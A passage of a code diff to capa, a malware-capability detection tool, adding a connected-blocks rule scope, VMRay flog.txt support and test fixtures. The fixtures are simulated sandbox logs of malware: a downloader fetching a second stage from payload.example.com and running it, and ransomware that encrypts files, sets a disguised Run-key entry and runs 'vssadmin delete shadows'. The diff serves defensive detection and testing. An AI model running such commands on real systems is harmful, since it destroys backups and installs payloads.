2 + ) -> set[Address]: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + 
def find_code_capabilities( self, ruleset: RuleSet, fh: FunctionHandle - ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults]: + ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults, MatchResults]: f_node: Optional[CapaRuleGenFeatureCacheNode] = self._get_cached_func_node(fh) if f_node is None: - return {}, {}, {}, {} + return {}, {}, {}, {}, {} insn_matches: MatchResults = collections.defaultdict(list) bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) function_features: FeatureSet = collections.defaultdict(set) + bb_features_by_address: dict[Address, FeatureSet] = {} for bb in f_node.children: features, bmatches, imatches = self._find_basic_block_capabilities(ruleset, bb) + bb_features_by_address[bb.address] = features for feature, locs in features.items(): function_features[feature].update(locs) for name, result in bmatches.items(): @@ -180,11 +215,27 @@ def find_code_capabilities( for name, result in imatches.items(): insn_matches[name].extend(result) + if ruleset.connected_block_rules: + adjacency = self._build_connected_block_adjacency(fh, f_node) + for bb in f_node.children: + neighborhood = self._collect_connected_neighborhood(adjacency, bb.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_addr in neighborhood: + for feature, locs in bb_features_by_address.get(bb_addr, {}).items(): + neighborhood_features[feature].update(locs) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, bb.address) + for name, result in matches.items(): + connected_block_matches[name].extend(result) + rule = ruleset[name] + for loc, _ in result: + capa.engine.index_rule_matches(function_features, rule, [loc]) + for feature, locs in itertools.chain(f_node.features.items(), self.global_features.items()): function_features[feature].update(locs) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, 
f_node.address) - return function_features, function_matches, bb_matches, insn_matches + return function_features, function_matches, connected_block_matches, bb_matches, insn_matches def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchResults]: features: FeatureSet = collections.defaultdict(set) @@ -193,7 +244,7 @@ def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchRes assert func_node.inner is not None assert isinstance(func_node.inner, FunctionHandle) - func_features, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) + func_features, _, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) for feature, locs in func_features.items(): features[feature].update(locs) diff --git a/capa/ida/plugin/form.py b/capa/ida/plugin/form.py index 800453bbfa..600ad0ccb2 100644 --- a/capa/ida/plugin/form.py +++ b/capa/ida/plugin/form.py @@ -1028,14 +1028,16 @@ def load_capa_function_results(self): all_function_features: FeatureSet = collections.defaultdict(set) try: if self.rulegen_current_function is not None: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) all_function_features.update( self.rulegen_feature_cache.get_all_function_features(self.rulegen_current_function) ) - for name, result in itertools.chain(func_matches.items(), bb_matches.items(), insn_matches.items()): + for name, result in itertools.chain( + func_matches.items(), cbb_matches.items(), bb_matches.items(), insn_matches.items() + ): rule = ruleset[name] if rule.is_subscope_rule(): continue @@ -1204,12 +1206,13 @@ def update_rule_status(self, rule_text: str): s in rule.scopes for s in ( capa.rules.Scope.FUNCTION, + capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.INSTRUCTION, ) ): try: - _, func_matches, 
bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) except Exception as e: @@ -1218,6 +1221,8 @@ def update_rule_status(self, rule_text: str): if capa.rules.Scope.FUNCTION in rule.scopes and rule.name in func_matches: is_match = True + elif capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes and rule.name in cbb_matches: + is_match = True elif capa.rules.Scope.BASIC_BLOCK in rule.scopes and rule.name in bb_matches: is_match = True elif capa.rules.Scope.INSTRUCTION in rule.scopes and rule.name in insn_matches: diff --git a/capa/ida/plugin/model.py b/capa/ida/plugin/model.py index 046dc1ea3f..e600e5c0c7 100644 --- a/capa/ida/plugin/model.py +++ b/capa/ida/plugin/model.py @@ -530,7 +530,10 @@ def render_capa_doc_by_program(self, doc: rd.ResultDocument): parent2 = parent elif capa.rules.Scope.FUNCTION in rule.meta.scopes: parent2 = CapaExplorerFunctionItem(parent, location) - elif capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes: + elif ( + capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes + or capa.rules.Scope.CONNECTED_BLOCKS in rule.meta.scopes + ): parent2 = CapaExplorerBlockItem(parent, location) elif capa.rules.Scope.INSTRUCTION in rule.meta.scopes: parent2 = CapaExplorerInstructionItem(parent, location) diff --git a/capa/loader.py b/capa/loader.py index d89d4c09fb..253cd04cc5 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -236,6 +236,8 @@ def get_extractor( elif backend == BACKEND_VMRAY: import capa.features.extractors.vmray.extractor + if input_path.name.endswith("flog.txt"): + return capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_path) return capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_path) elif backend == BACKEND_DOTNET: @@ -491,7 +493,14 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr 
elif input_format == FORMAT_VMRAY: import capa.features.extractors.vmray.extractor - file_extractors.append(capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file)) + if input_file.name.endswith("flog.txt"): + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_file) + ) + else: + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file) + ) elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) @@ -720,7 +729,7 @@ def compute_static_layout(rules: RuleSet, extractor: StaticFeatureExtractor, cap matched_bbs = set() for rule_name, matches in capabilities.items(): rule = rules[rule_name] - if capa.rules.Scope.BASIC_BLOCK in rule.scopes: + if capa.rules.Scope.BASIC_BLOCK in rule.scopes or capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes: for addr, _ in matches: assert addr in functions_by_bb matched_bbs.add(addr) diff --git a/capa/render/proto/__init__.py b/capa/render/proto/__init__.py index 31b272e525..f28d910f1f 100644 --- a/capa/render/proto/__init__.py +++ b/capa/render/proto/__init__.py @@ -155,6 +155,10 @@ def scope_to_pb2(scope: capa.rules.Scope) -> capa_pb2.Scope.ValueType: return capa_pb2.Scope.SCOPE_FILE elif scope == capa.rules.Scope.FUNCTION: return capa_pb2.Scope.SCOPE_FUNCTION + elif scope == capa.rules.Scope.CONNECTED_BLOCKS: + # protobuf schema does not yet have a dedicated static connected-block scope enum. + # encode as basic block for wire compatibility. 
+ return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.BASIC_BLOCK: return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.INSTRUCTION: diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index da0a7d0360..49170b1440 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -89,6 +89,7 @@ class Scope(str, Enum): SPAN_OF_CALLS = "span of calls" CALL = "call" FUNCTION = "function" + CONNECTED_BLOCKS = "connected blocks" BASIC_BLOCK = "basic block" INSTRUCTION = "instruction" @@ -107,6 +108,7 @@ def to_yaml(cls, representer, node): Scope.FILE, Scope.GLOBAL, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, } @@ -219,6 +221,10 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": capa.features.common.Characteristic("recursive call"), # plus basic block scope features, see below }, + Scope.CONNECTED_BLOCKS: { + capa.features.common.MatchedRule, + # plus basic block scope features, see below + }, Scope.BASIC_BLOCK: { capa.features.common.MatchedRule, capa.features.common.Characteristic("tight loop"), @@ -252,6 +258,7 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # global scope features are available in all other scopes SUPPORTED_FEATURES[Scope.INSTRUCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.GLOBAL]) +SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FILE].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.PROCESS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) @@ -269,6 +276,8 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # all instruction scope features are also basic block features SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.INSTRUCTION]) +# all basic block scope features are also connected blocks features 
+SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) # all basic block scope features are also function scope features SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) @@ -588,9 +597,31 @@ def unique(sequence): return [x for x in sequence if not (x in seen or seen.add(x))] # type: ignore [func-returns-value] +def parse_connected_blocks_subscope_key(key: str) -> bool: + """ + return True when the key denotes a connected-blocks subscope declaration. + + supported forms: + - connected blocks + - connected_blocks(depth=2) + """ + if key == "connected blocks": + return True + + if not key.startswith("connected_blocks(") or not key.endswith(")"): + return False + + body = key[len("connected_blocks(") : -len(")")] + if body != "depth=2": + raise InvalidRule("only connected_blocks(depth=2) is supported") + + return True + + STATIC_SCOPE_ORDER = [ Scope.FILE, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, ] @@ -707,7 +738,7 @@ def build_statements(d, scopes: Scopes): elif key == "basic block": if not is_subscope_compatible(scopes.static, Scope.BASIC_BLOCK): - raise InvalidRule("`basic block` subscope supported only for `function` scope") + raise InvalidRule("`basic block` subscope supported only for `function` and `connected blocks` scope") if len(d[key]) != 1: raise InvalidRule("subscope must have exactly one child statement") @@ -716,9 +747,25 @@ def build_statements(d, scopes: Scopes): Scope.BASIC_BLOCK, build_statements(d[key][0], Scopes(static=Scope.BASIC_BLOCK)), description=description ) + elif parse_connected_blocks_subscope_key(key): + if not is_subscope_compatible(scopes.static, Scope.CONNECTED_BLOCKS): + raise InvalidRule("`connected blocks` subscope supported only for `function` scope") + + if len(d[key]) != 1: + raise InvalidRule("subscope must have exactly one child statement") + + # MVP: fixed proximity depth=2 in static matching pipeline. 
+ return ceng.Subscope( + Scope.CONNECTED_BLOCKS, + build_statements(d[key][0], Scopes(static=Scope.CONNECTED_BLOCKS)), + description=description, + ) + elif key == "instruction": if not is_subscope_compatible(scopes.static, Scope.INSTRUCTION): - raise InvalidRule("`instruction` subscope supported only for `function` and `basic block` scope") + raise InvalidRule( + "`instruction` subscope supported only for `function`, `connected blocks`, and `basic block` scope" + ) if len(d[key]) == 1: statements = build_statements(d[key][0], Scopes(static=Scope.INSTRUCTION)) @@ -1433,6 +1480,7 @@ def __init__( Scope.PROCESS, Scope.INSTRUCTION, Scope.BASIC_BLOCK, + Scope.CONNECTED_BLOCKS, Scope.FUNCTION, Scope.FILE, ) @@ -1475,6 +1523,10 @@ def function_rules(self): def basic_block_rules(self): return self.rules_by_scope[Scope.BASIC_BLOCK] + @property + def connected_block_rules(self): + return self.rules_by_scope[Scope.CONNECTED_BLOCKS] + @property def instruction_rules(self): return self.rules_by_scope[Scope.INSTRUCTION] diff --git a/doc/usage.md b/doc/usage.md index 6a207ed6f6..d3ccfa8fd9 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -2,10 +2,50 @@ See `capa -h` for all supported arguments and usage examples. +## Ways to consume capa output + +| Option | Description | Typical use | +|--------|-------------|-------------| +| **CLI** | `capa` on the command line | Scripting, CI/CD, one-off analysis | +| [**IDA Pro**](https://github.com/mandiant/capa/tree/master/capa/ida/plugin) | capa Explorer plugin inside IDA | Interactive analysis with jump-to-address | +| [**Ghidra**](https://github.com/mandiant/capa/tree/master/capa/ghidra/plugin) | capa Explorer plugin inside Ghidra | Interactive analysis with Ghidra integration | +| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. 
CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output | +| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar | + ## Default vs verbose output By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. +## VMRay: flog.txt vs full analysis archive + +When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file. +Choose based on what you have access to and what features you need. + +| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** | +|-|-|-| +| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* | +| **File size** | Small text file | Large encrypted ZIP | +| **Dynamic API calls** | ✓ | ✓ | +| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Static imports / exports** | ✗ | ✓ | +| **PE/ELF section names** | ✗ | ✓ | +| **Embedded file strings** | ✗ | ✓ | +| **Base address** | ✗ | ✓ | +| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) | + +**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log. 
+ +**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data. + +``` +# flog.txt — free, limited to dynamic API calls +capa path/to/flog.txt + +# Full VMRay archive — requires subscription, richer features +capa path/to/analysis_archive.zip +``` + ## tips and tricks ### only run selected rules diff --git a/scripts/demo_connected_blocks_and_triage.py b/scripts/demo_connected_blocks_and_triage.py new file mode 100644 index 0000000000..ac8f9b7e8a --- /dev/null +++ b/scripts/demo_connected_blocks_and_triage.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +""" +Demo helper for: + - function triage counts (skip/deprioritize/analyze) + - connected-block rule syntax +""" + +import argparse +import textwrap +from pathlib import Path +from collections import Counter +from typing import Counter as CounterType + +import capa.loader +import capa.rules +from capa.rules import Scope +from capa.capabilities.triage import TriageDecision, classify_function +from capa.features.extractors.viv.extractor import VivisectFeatureExtractor +from capa.features.common import OS_AUTO, FORMAT_AUTO + + +CONNECTED_BLOCKS_RULE = textwrap.dedent( + """ + rule: + meta: + name: demo connected blocks + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile + """ +) + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("input", type=Path, help="sample path") + args = parser.parse_args() + + vw = capa.loader.get_workspace(args.input, FORMAT_AUTO, sigpaths=[]) + extractor = VivisectFeatureExtractor(vw, args.input, OS_AUTO) + + triage_counts: CounterType[str] = Counter() + for fh in extractor.get_functions(): + if extractor.is_library_function(fh.address): + triage_counts[TriageDecision.SKIP.value] += 1 + continue + triage = classify_function(extractor, fh) + triage_counts[triage.decision.value] += 1 + + print("triage counts:") + print(f" analyze : {triage_counts[TriageDecision.ANALYZE.value]}") + print(f" deprioritize : {triage_counts[TriageDecision.DEPRIORITIZE.value]}") + print(f" skip : {triage_counts[TriageDecision.SKIP.value]}") + print() + print("connected blocks rule syntax:") + print(CONNECTED_BLOCKS_RULE.strip()) + + r = capa.rules.Rule.from_yaml(CONNECTED_BLOCKS_RULE) + print() + print("parsed rule scopes:", r.scopes) + print("connected blocks scope literal:", Scope.CONNECTED_BLOCKS.value) + + +if __name__ == "__main__": + main() diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py new file mode 100644 index 
0000000000..e9859056dc --- /dev/null +++ b/scripts/fetch-vmray-flog.py @@ -0,0 +1,270 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it. + +Given a sample SHA-256 hash and VMRay credentials, this script: + 1. Looks up the sample on the VMRay instance. + 2. Finds the most-recent analysis for that sample. + 3. Downloads the flog.txt (Download Function Log) from the analysis archive. + 4. Optionally runs capa against the downloaded file. + +Requirements: + pip install requests + +Usage:: + + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --output /tmp/sample_flog.txt + + # Fetch and immediately run capa: + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --run-capa + +VMRay API reference: + https://docs.vmray.com/documents/api-reference/ + +Note: this script requires a VMRay account. The flog.txt itself is freely available +("Download Function Log") in the VMRay Threat Feed web UI, but downloading it +programmatically via the REST API requires valid API credentials. 
+""" + +import argparse +import logging +import subprocess +import sys +from pathlib import Path + +import requests + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# VMRay REST API helpers +# --------------------------------------------------------------------------- + +_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt" + + +def _session(url: str, apikey: str) -> requests.Session: + """Return an authenticated requests.Session for the given VMRay instance.""" + s = requests.Session() + s.headers.update( + { + "Authorization": f"api_key {apikey}", + "Accept": "application/json", + } + ) + s.verify = True # set to False only when using self-signed certificates + s.base_url = url.rstrip("/") # type: ignore[attr-defined] + return s + + +def _get(session: requests.Session, path: str, **kwargs) -> dict: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.json() + + +def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.content + + +def lookup_sample(session: requests.Session, sha256: str) -> dict: + """ + Return the VMRay sample record for the given SHA-256. + Raises ValueError if the sample is not found. + """ + data = _get(session, f"/rest/sample/sha256/{sha256}") + if data.get("result") != "ok" or not data.get("data"): + raise ValueError(f"sample not found on VMRay instance: {sha256}") + # data["data"] is a list; take the first entry + return data["data"][0] + + +def get_latest_analysis(session: requests.Session, sample_id: int) -> dict: + """ + Return the most-recent finished analysis for the given VMRay sample ID. + Raises ValueError if no analysis is found. 
+ """ + data = _get(session, "/rest/analysis", params={"sample_id": sample_id}) + analyses = data.get("data", []) + if not analyses: + raise ValueError(f"no analyses found for sample_id={sample_id}") + # Sort by analysis_id descending (newest first) + analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True) + return analyses[0] + + +def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes: + """ + Download the flog.txt content for the given VMRay analysis ID. + + VMRay exposes the function log via the analysis archive endpoint. + We request only the flog_txt entry from the archive using the + ``file_filter`` query parameter. + """ + # Try the dedicated log endpoint first (VMRay >= 2024.x) + try: + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary", + ) + if content: + return content + except requests.HTTPError: + pass + + # Fallback: download via the analysis archive with a file filter + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/archive", + params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH}, + ) + return content + + +# --------------------------------------------------------------------------- +# main +# --------------------------------------------------------------------------- + + +def main(argv=None): + if argv is None: + argv = sys.argv[1:] + + parser = argparse.ArgumentParser( + description="Download VMRay flog.txt for a sample hash and (optionally) run capa." + ) + parser.add_argument( + "--url", + required=True, + metavar="URL", + help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com", + ) + parser.add_argument( + "--apikey", + required=True, + metavar="KEY", + help="VMRay REST API key (Settings → API Keys).", + ) + parser.add_argument( + "--sha256", + required=True, + metavar="SHA256", + help="SHA-256 hash of the sample to analyse.", + ) + parser.add_argument( + "--output", + metavar="PATH", + help="Where to save the downloaded flog.txt. 
Defaults to <sha256>_flog.txt in the current directory.", + ) + parser.add_argument( + "--run-capa", + action="store_true", + dest="run_capa", + help="After downloading, run 'capa <flog.txt>' and print the results.", + ) + parser.add_argument( + "--capa-args", + metavar="ARGS", + default="", + help="Extra arguments forwarded to capa (only used with --run-capa).", + ) + parser.add_argument( + "--no-verify-ssl", + action="store_false", + dest="verify_ssl", + help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).", + ) + parser.add_argument( + "-d", "--debug", action="store_true", help="Enable debug logging." + ) + args = parser.parse_args(argv) + + logging.basicConfig( + level=logging.DEBUG if args.debug else logging.INFO, + format="%(levelname)s: %(message)s", + ) + + output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt") + + session = _session(args.url, args.apikey) + session.verify = args.verify_ssl # type: ignore[assignment] + + # Step 1 — look up sample + logger.info("looking up sample %s …", args.sha256) + try: + sample = lookup_sample(session, args.sha256) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find sample: %s", exc) + return 1 + + sample_id: int = sample["sample_id"] + logger.debug("found sample_id=%d", sample_id) + + # Step 2 — find the latest analysis + logger.info("fetching analysis list for sample_id=%d …", sample_id) + try: + analysis = get_latest_analysis(session, sample_id) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find analysis: %s", exc) + return 1 + + analysis_id: int = analysis["analysis_id"] + logger.debug("using analysis_id=%d", analysis_id) + + # Step 3 — download flog.txt + logger.info("downloading flog.txt for analysis_id=%d …", analysis_id) + try: + flog_bytes = download_flog_txt(session, analysis_id) + except requests.HTTPError as exc: + logger.error("failed to download flog.txt: %s", exc) + return 1 + + if not
flog_bytes: + logger.error( + "received empty response — flog.txt may not be available for this analysis" + ) + return 1 + + output_path.write_bytes(flog_bytes) + logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes)) + + # Step 4 (optional) — run capa + if args.run_capa: + capa_cmd = ["capa", str(output_path)] + ( + args.capa_args.split() if args.capa_args else [] + ) + logger.info("running: %s", " ".join(capa_cmd)) + result = subprocess.run(capa_cmd) + return result.returncode + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt new file mode 100644 index 0000000000..cf120d9e6e --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt @@ -0,0 +1,29 @@ +# Log Creation Date: 06.03.2025 09:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x0500" +os_parent_pid = "0x0004" +parent_id = "0" +image_name = "downloader.exe" +filename = "c:\users\admin\downloader.exe" +cmd_line = "downloader.exe" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x0501" + [0001.000] InternetOpenA (lpszAgent="WinInet", dwAccessType=0x0, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c0000 + [0001.001] InternetConnectA (hInternet=0x4c0000, lpszServerName="payload.example.com", nServerPort=0x50, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c0004 + [0001.002] HttpOpenRequestA (hConnect=0x4c0004, lpszVerb="GET", lpszObjectName="/stage2.bin", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c0008 + [0001.003] HttpSendRequestA (hRequest=0x4c0008, lpszHeaders=NULL, dwHeadersLength=0x0, lpOptional=NULL, dwOptionalLength=0x0) returned 0x1 + [0001.004] InternetReadFile (hFile=0x4c0008, lpBuffer=0x20000, dwNumberOfBytesToRead=0x10000, 
lpdwNumberOfBytesRead=0x30000) returned 0x1 + [0001.005] CreateFileA (lpFileName="C:\Windows\Temp\svchost32.exe", dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x60 + [0001.006] WriteFile (hFile=0x60, lpBuffer=0x20000, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x40000, lpOverlapped=NULL) returned 0x1 + [0001.007] WinExec (lpCmdLine="C:\Windows\Temp\svchost32.exe", uCmdShow=0x0) returned 0x21 diff --git a/tests/fixtures/vmray/flog_txt/format_variance.flog.txt b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt new file mode 100644 index 0000000000..473ec0b51f --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt @@ -0,0 +1,74 @@ +# Log Creation Date: 05.03.2025 14:22:07 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "0001" +os_pid = "0x00000ABC" +os_parent_pid = "0x0004" +parent_id = "0000" +image_name = "ransomware.exe" +filename = "c:\\users\\victim\\desktop\\ransomware.exe" +cmd_line = "\"c:\\users\\victim\\desktop\\ransomware.exe\" --silent" +monitor_reason = "analysis_target" + +Region: +id = "0010" +name = "private_0x0000000000010000" + +Thread: +id = "0001" +os_tid = "0x00001B00" + [0001.000] GetCurrentProcess () returned 0xFFFFFFFFFFFFFFFF + [0001.001] CryptAcquireContextW (phProv=0x2000, szContainer=NULL, szProvider=NULL, dwProvType=24, dwFlags=0xF0000000) returned 1 + [0001.002] CryptGenRandom (hProv=0x2000, dwLen=16, pbBuffer=0x3000) returned 1 + [0001.003] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\important.docx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x00000054 + [0001.004] ReadFile (hFile=0x54, lpBuffer=0x4000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x5000, lpOverlapped=NULL) returned 1 + [0001.005] WriteFile (hFile=0x54, lpBuffer=0x6000, 
nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x7000, lpOverlapped=NULL) returned 1 + [0001.006] CloseHandle (hObject=0x54) returned 1 + [0001.007] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\important.docx", lpNewFileName="C:\\Users\\victim\\Documents\\important.docx.locked", dwFlags=0x1) returned 1 + [0001.008] RegOpenKeyExW (hKey=2147483650, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0, samDesired=131097) returned 0 + [0001.009] RegSetValueExW (hKey=0x100, lpValueName="WindowsDefender", Reserved=0, dwType=1, lpData="C:\\Users\\victim\\Desktop\\ransomware.exe") returned 0 + [0001.010] DeleteFileW (lpFileName="C:\\Windows\\System32\\vssadmin.exe") returned 0x80070005 + [0001.011] CreateProcessW (lpApplicationName=NULL, lpCommandLine="vssadmin.exe delete shadows /all /quiet", dwCreationFlags=8, lpEnvironment=NULL, lpCurrentDirectory=NULL, lpStartupInfo=0x8000, lpProcessInformation=0x9000) returned 1 + [0001.012] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0)", dwAccessType=1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0) returned 0x4c9804 + [0001.013] InternetOpenUrlW (hInternet=0x4c9804, lpszUrl="http://ransom.example.com/key?id=ABCDEF0123456789", dwHeadersLength=0, dwFlags=0x80000000, dwContext=0) returned 0x4c9808 + [0001.014] HttpSendRequestW (hRequest=0x4c9808, lpszHeaders=NULL, dwHeadersLength=0, lpOptional=NULL, dwOptionalLength=0) returned 1 + [0001.015] CoTaskMemFree (pv=0x746aa0) + [0001.016] GetSystemInfo (lpSystemInfo=0x1000) + [0001.017] WaitForSingleObject (hHandle=0x200, dwMilliseconds=4294967295) returned 0x0 + [0001.018] ExitProcess (uExitCode=0) + +Thread: +id = "0002" +os_tid = "0x00001B01" + [0002.000] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, 